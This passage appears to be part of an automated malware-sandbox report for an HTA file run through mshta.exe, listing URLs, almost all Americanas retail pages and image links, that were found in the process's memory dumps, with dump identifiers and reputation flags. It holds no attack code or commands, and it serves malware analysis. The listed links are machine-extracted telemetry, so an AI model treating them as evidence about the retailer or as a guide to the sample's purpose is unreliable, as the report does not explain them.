00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefoniamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                          high
                                                                                                                          https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelossq)mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.americanas.com.br/busca/ar-condicionado-split-9000-btusmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579280057.000000000BE8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngw.imshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                  high
                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png9Fmshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imagmshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558448951.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558658695.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                      high
                                                                                                                                      https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.pngxdmshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-thememshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489344982.0000000009B23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489202013.0000000009B1E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579844318.000000000C005000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557060559.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12520851219.0000000009B29000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489241096.0000000009B1F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12489406959.0000000009B25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                            high
                                                                                                                                            https://www.americanas.com.br/hotsite/banner-cameba?chave=dk_hm_bn_5_4_camebamshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573176961.000000000715C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557976604.0000000007154000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516075733.000000000964D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresasmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.americanas.com.br/categoria/enfeites-de-natal_Smshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefoniamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555668791.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                      high
                                                                                                                                                      https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_mob-f565c14907fb.pngmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                        high
                                                                                                                                                        https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateismshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://nossaslojas.americanas.com.br/?chave=dk_ft_lojasmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566877720.000000000AB6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 